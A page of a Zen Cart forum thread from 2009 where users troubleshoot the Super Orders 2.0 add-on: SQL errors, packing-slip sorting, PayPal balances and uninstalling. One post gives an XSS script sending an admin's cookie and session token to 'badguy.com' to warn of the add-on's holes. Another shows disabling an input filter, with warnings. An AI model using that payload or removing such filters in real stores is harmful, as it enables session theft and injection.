Zen Cart Logo
Forums / All Other Contributions/Addons / OLD Super Orders 2.0 (See v3.0 thread instead)

OLD Super Orders 2.0 (See v3.0 thread instead)

Locked

Views: 456,074

Results 1,241 to 1,260 of 2,020
This thread is locked. New replies are disabled.
28 Feb 2009, 6:01 AM
#1241
tuncay avatar

tuncay

New Zenner

Join Date:
Sep 2006
Posts:
56
Plugin Contributions:
0

OLD Super Orders 2.0 (See v3.0 thread instead)

batch status update batch form print for values < less then and equal is giving below error

1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''250' ORDER BY o.orders_id DESC' at line 4
in:
[SELECT o.orders_id, o.customers_id, o.customers_name, o.payment_method, o.date_purchased, o.order_total, s.orders_status_name FROM zen_orders o LEFT JOIN zen_orders_status s ON o.orders_status = s.orders_status_id WHERE s.language_id = '1' AND o.order_total '250' ORDER BY o.orders_id DESC]
If you were entering information, press the BACK button in your browser and re-check the information you had entered to be sure you left no blank fields

is this a bug for php 5.xx
thank you

28 Feb 2009, 8:59 AM
#1242
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

No that is a SQL error missing an = sign before the '250'

1 Mar 2009, 4:26 AM
#1243
tuncay avatar

tuncay

New Zenner

Join Date:
Sep 2006
Posts:
56
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

can you open it up a little where i need to look to fix.
you mean there is a a problem at my database.

1 Mar 2009, 9:00 AM
#1244
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

tuncay:

batch status update batch form print for values < less then and equal is giving below error

1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''250' ORDER BY o.orders_id DESC' at line 4
in:
[SELECT o.orders_id, o.customers_id, o.customers_name, o.payment_method, o.date_purchased, o.order_total, s.orders_status_name FROM zen_orders o LEFT JOIN zen_orders_status s ON o.orders_status = s.orders_status_id WHERE s.language_id = '1' AND o.order_total '250' ORDER BY o.orders_id DESC]
If you were entering information, press the BACK button in your browser and re-check the information you had entered to be sure you left no blank fields

is this a bug for php 5.xx
thank you

The most I can open it up is that the PHP should have read o.order_total = '250' which is why you got the error, since I do not know what > "batch status update batch form print for values < less then and equal is giving below error" means.

It means no PHP 5 problem, no problem with the database, it means wherever you are there is a problem with the code sending information through to the database. If you can repeat the exact steps to get the error, probably I can find where to put the = sign in the code.

1 Mar 2009, 9:43 AM
#1245
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

What you mean is "when I goto the page super_batch_forms.php and type in 250 into the order total box and select < (less than) then I get this error".

At which point I look through the code and go "oh dear". I am going through the code, there is a tremendous amount of SQL insertion problems, although as it is inside admin it should only be affected by authorised users.

There is a problem, it's nothing to do with the PHP version, or the database, it's a coding issue and may not even be anything to do with super orders and so far has required eliminating quite a few pages for coding errors and may take some more time, and there's no point in explaining it, because it would be an explantion in PHP which you probably would not understand.

1 Mar 2009, 10:27 AM
#1246
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

In admin/includes/init_includes/init_general_funcs.php there is this at the bottom of the page:

if (isset($_GET) & sizeof($_GET) > 0 ) {
  foreach ($_GET as $key=>$value) {
    $_GET[$key] = strip_tags($value);
  }
}

and if you change the one line to

//    $_GET[$key] = strip_tags($value);

then super_batch_forms.php will work when using the less than function for the order total.

BUT this is not recommended at all

The strip_tags code is in Zen Cart as a security measure to stop XSS attacks. Super orders needs re-coding because it submits <= to the page and Zen Cart strips it out because the strip_tags function thinks it is a HTML tag. Super orders is full of SQL Insertion security holes and possible XSS attacks and the Zen cart code is there to try and stop them. At the moment the only solution to the bug is to open up more security holes in your system although if the admin folder has been moved as recommended in the general security guidelines, it's not a really big hole.

Philip.

2 Mar 2009, 4:37 AM
#1247
tuncay avatar

tuncay

New Zenner

Join Date:
Sep 2006
Posts:
56
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

thank you for your reply but i mixed up more.
what is the problem. exactly a security hole or not .

the admin folder has been moved as recommended in the general security guidelines, it's not a really big hole.

you mean by that ssl secured admin area .
thank you

2 Mar 2009, 4:44 AM
#1248
tuncay avatar

tuncay

New Zenner

Join Date:
Sep 2006
Posts:
56
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

also this isn't working if i choose equal, but it is worknig if i chose more then. may be the answer is looking more then and imitating that for less then and equal.

but i amn't an expert i don't know how to code. i am thinking simple. may be possible or may be not.
thank you

2 Mar 2009, 7:32 AM
#1249
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

First thing SSL in admin will do nothing for the case you mentioned if you have not moved the admin folder. Please read the security guidelines in http://YOUR_WEBISTE_ADDRESS/docs/important_site_security_recommendations.html

All of super orders is full of security holes because there is no filtering of $_GET or $_POST. At somepoint ZC introduced basic filtering on $_GET in the file admin/includes/init_includes/init_general_funcs.php and this has stopped super_orders from working in the one arear that you mentioned. If you wish to edit that file as mentioned above, then the bug will disappear, but you will have a larger hole.

The hole is an XSS or SQL injection one, but would only be usable if someone knew the location of your admin folder and possibly if they could log on (although they may be able to steal a session by sniffing the cookie or session variable if you are not using SSL for admin). If they stole your session variable then they could do anything with your database that they liked but if they stole your session, they could easily apply a SQL patch and do the same thing.

The risk is low but if you wish to edit the the file I mentioned then the whole rest of your admin area will also be open to possible SQL Injection or XSS attacks because if you are opening it in that function to fix that bug then you will expose the whole of administration.

9 Mar 2009, 2:40 AM
#1250
brettw avatar

brettw

New Zenner

Join Date:
Mar 2008
Posts:
64
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

Hi All,

A quick question in regards to sorting alphabetically in the super packing slip.

I had a look back through the thread and there is a few questions about sorting the products on the packing slip alphabetically however there does not seem to be any replies.

Can someone point me in the right direction of where I need to edit the packing slip code to sort the array of products.

Thanks in advance
Brett

9 Mar 2009, 8:10 AM
#1251
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

Short answer is no, you cannot order the objecs in a packing slip alphabetically unless you write a new function to sort the products out.

The products are not stored in a SQL statement that can be ordered, they are stored in a fixed object array like below

Array
(
    [0] => Array
        (
            [qty] => 1
            [id] => 111
            [name] => TEST $120 Special $90.00 Sale -$5.00 Skip
            [model] => Test120-90-5SKIP
            [tax] => 0.0000
            [price] => 90.0000
            [onetime_charges] => 0.0000
            [final_price] => 120.0000
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Size
                            [value] => X-Small
                            [prefix] => +
                            [price] => 40.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

    [1] => Array
        (
            [qty] => 1
            [id] => 1
            [name] => Matrox G200 MMS
            [model] => MG200MMS
            [tax] => 0.0000
            [price] => 299.9900
            [onetime_charges] => 0.0000
            [final_price] => 299.9900
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Model
                            [value] => Value
                            [prefix] => +
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                    [1] => Array
                        (
                            [option] => Memory
                            [value] => 4 mb
                            [prefix] => 
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

    [2] => Array
        (
            [qty] => 1
            [id] => 1
            [name] => Matrox G200 MMS
            [model] => MG200MMS
            [tax] => 0.0000
            [price] => 299.9900
            [onetime_charges] => 0.0000
            [final_price] => 469.9900
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Model
                            [value] => Premium
                            [prefix] => +
                            [price] => 100.0000
                            [product_attribute_is_free] => 0
                        )

                    [1] => Array
                        (
                            [option] => Memory
                            [value] => 16 mb
                            [prefix] => +
                            [price] => 70.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

    [3] => Array
        (
            [qty] => 1
            [id] => 1
            [name] => Matrox G200 MMS
            [model] => MG200MMS
            [tax] => 0.0000
            [price] => 299.9900
            [onetime_charges] => 0.0000
            [final_price] => 299.9900
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Model
                            [value] => Value
                            [prefix] => +
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                    [1] => Array
                        (
                            [option] => Memory
                            [value] => 4 mb
                            [prefix] => 
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

)

which is from the examples shipped with zen-cart. One would need to write a new function to take the $order->products object, put in a temp object, resort it on the name attribute and then pop it back into the code.

9 Mar 2009, 6:56 PM
#1252
smatric avatar

smatric

New Zenner

Join Date:
Feb 2009
Location:
BC, Canada
Posts:
10
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

smatric:

Hi all,

I started to cooperate with HiPCTech. We use for our webstore Zen Cart with Super Orders module. We had a problem with "Balance Due". If someone paid through PayPal, Super Orders still showed "Balance Due" to be paid. I've found a solution to this problem and I'd like to post it here so that maybe someone can also find it useful.

Whole changes are made in "zcmanager/includes/classes/super_order.php". I modified "start()" function and added one new ("check_paypal_payments()"). What it does is it basically selects PayPal payments from "TABLE_PAYPAL" where order_id equals "$this->oID" and adds "mc_gross" value to "amount_applied". It takes only payments from "paypalwpp" or "paypal 1.3.8a" or "paypal (ipn-handler)" modules. There might be a better way to do it. Maybe just to select all except for "paypaldp". But for security I wrote it like that.

We've just notice another "Balance Due problem". I'd like to share with you my solution hoping it might be useful for somebody.

The problem was with PayPal payments in foreign currencies. The total order amount is not being multiplied by currency value resulting in lover value and in negative value of balance due. (We use Super Orders by Frank Koehl written on "27 2006-02-03 20:06:12".)

Here is a proposed solution:

in zcmanager/includes/classes/super_order.php replace line:

    	$this->order_total = $order_query->fields['order_total'];

with:

    if($order_query->fields['payment_method'] == 'PayPal') {
    	$this->order_total = round($order_query->fields['currency_value'] * $order_query->fields['order_total'], 2);
    }
    else {
    	$this->order_total = $order_query->fields['order_total'];
    }
9 Mar 2009, 7:10 PM
#1253
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

What I think is that super orders is in desperate need to be brought up to date, the orders.php dates back to early 2006, and there are multiple uses of unfiltered $_GET values as well as displaying values striaght out of the db, without filtering the content e.g. someone puts in a memo field

<script>document.images[0].src=http://badguy.com?document.cookie+' '+zenAdminId+' '+securityToken</script>

That's just a theoretical example, it doesn't work but if an administrator were to look at a COD order then it would secretly post the administrator's session information through to badguy.com, super orders is littered with XSS vulnerabilities. I may have time in a few weeks, but really there needs to be a fulltime volunteer. (I already maintain a couple of modules).

Philip.

11 Mar 2009, 12:11 PM
#1254
zinfandel avatar

zinfandel

Zen Follower

Join Date:
Feb 2007
Location:
NNJ
Posts:
205
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

brettw:

Hi All,

A quick question in regards to sorting alphabetically in the super packing slip.

I had a look back through the thread and there is a few questions about sorting the products on the packing slip alphabetically however there does not seem to be any replies.

Can someone point me in the right direction of where I need to edit the packing slip code to sort the array of products.

Thanks in advance
Brett

Hello Brett,
If I'm not mistaken, the array of products is populated based on the results of an SQL query. If you can find it, and modify the ORDER BY clause, you will be able to influence the order of the array and therefore your packing slip. However, this will be the order of all resulting arrays that use the same query.

11 Mar 2009, 2:51 PM
#1255
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

You are mistaken, the order is populated by a sql query that stores the shopping cart before a purchase has even gone through the checkout, that way when a product is deleted from the store, the invoice still has the products on it (legal requirement).

12 Mar 2009, 5:45 AM
#1256
hc1501 avatar

hc1501

New Zenner

Join Date:
Jan 2009
Posts:
64
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

My super order is creating a problem with my payment gateway module. I want it removed.. Please anyone help...

12 Mar 2009, 7:19 AM
#1257
rleepac avatar

rleepac

New Zenner

Join Date:
Jan 2009
Posts:
44
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

Thieving_Gypsy:

Hello

I ahve a site running Super Orders and I have encountered some problems where the Tax is not displayed in the tax colomn of the Super Invoice even though the product is taxable.

Products Model Tax Unit Price Total
1 x ANT

  • Size: 12 (0111089120) 0111089 None! £11.02 £11.02

The unite price is correct but then the Total column is incorrect as it doesn't add the tax either...

However the Sub-Total value does take into account the TAX and displays correctly...

Can anyone shed any light?

Thanks

Andy

Did you figure this out or get an answer to this? I'm having the same problem. The total is right but under the tax column it just shows "none!"

Anyone?

12 Mar 2009, 7:33 AM
#1258
philip_clarke avatar

philip_clarke

Suspended

Join Date:
Sep 2008
Posts:
608
Plugin Contributions:
3

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

It would be helpful if you could post to the forum which gateway it is, so that other people could become aware of any potential problems.

Reverse any changes you made when you followed the installation instructions. The easiest way to do this is to download a copy of ZC and take the files

includes/classes/order.php
admin/includes/classes/order.php
admin/includes/general.js

and upload them to your server overwriting the ones you my have edited.

This is the full list of php files in the zip that could be affecting things:

./catalog/admin/super_batch_status.php
./catalog/admin/super_edit.php
./catalog/admin/super_orders.php
./catalog/admin/super_report_await_pay.php
./catalog/admin/super_packingslip.php
./catalog/admin/super_shipping_label.php
./catalog/admin/super_customers.php
./catalog/admin/super_report_cash.php
./catalog/admin/super_invoice.php
./catalog/admin/super_payment_types.php
./catalog/admin/super_payments.php
./catalog/admin/includes/languages/english/super_batch_status.php
./catalog/admin/includes/languages/english/super_edit.php
./catalog/admin/includes/languages/english/super_orders.php
./catalog/admin/includes/languages/english/super_report_await_pay.php
./catalog/admin/includes/languages/english/super_packingslip.php
./catalog/admin/includes/languages/english/super_customers.php
./catalog/admin/includes/languages/english/super_report_cash.php
./catalog/admin/includes/languages/english/super_invoice.php
./catalog/admin/includes/languages/english/super_payment_types.php
./catalog/admin/includes/languages/english/super_payments.php
./catalog/admin/includes/languages/english/super_data_sheet.php
./catalog/admin/includes/languages/english/super_batch_forms.php
./catalog/admin/includes/languages/english/order_status_email.php
./catalog/admin/includes/boxes/extra_boxes/super_orders_localization_dhtml.php
./catalog/admin/includes/boxes/extra_boxes/super_orders_reports_dhtml.php
./catalog/admin/includes/boxes/extra_boxes/super_orders_customers_dhtml.php
./catalog/admin/includes/extra_datafiles/super_orders_defines.php
./catalog/admin/includes/functions/extra_functions/super_orders_functions.php
./catalog/admin/includes/classes/popup.php
./catalog/admin/includes/classes/customer.php
./catalog/admin/includes/classes/super_order.php
./catalog/admin/super_data_sheet.php
./catalog/admin/super_batch_forms.php
./catalog/includes/languages/english/modules/payment/purchaseorder.php
./catalog/includes/extra_datafiles/super_orders_defines.php
./catalog/includes/modules/payment/purchaseorder.php
./catalog/includes/classes/super_order.php
./_upgrade/super_upgrade.php

remove the ones under includes first (these ones)

includes/languages/english/modules/payment/purchaseorder.php
includes/extra_datafiles/super_orders_defines.php
includes/modules/payment/purchaseorder.php
includes/classes/super_order.php

Philip.

16 Mar 2009, 6:06 PM
#1259
serrow avatar

serrow

New Zenner

Join Date:
Feb 2009
Posts:
13
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

I read through a b'jillion posts on this but can't find if this is workable off the shelf for 1.3.8

16 Mar 2009, 7:31 PM
#1260
azrahn avatar

azrahn

Zen Follower

Join Date:
Jun 2006
Location:
Koh Samui
Posts:
120
Plugin Contributions:
0

Re: OLD Super Orders 2.0 (See v3.0 thread instead)

serrow:

I read through a b'jillion posts on this but can't find if this is workable off the shelf for 1.3.8

Yep, still working.:clap: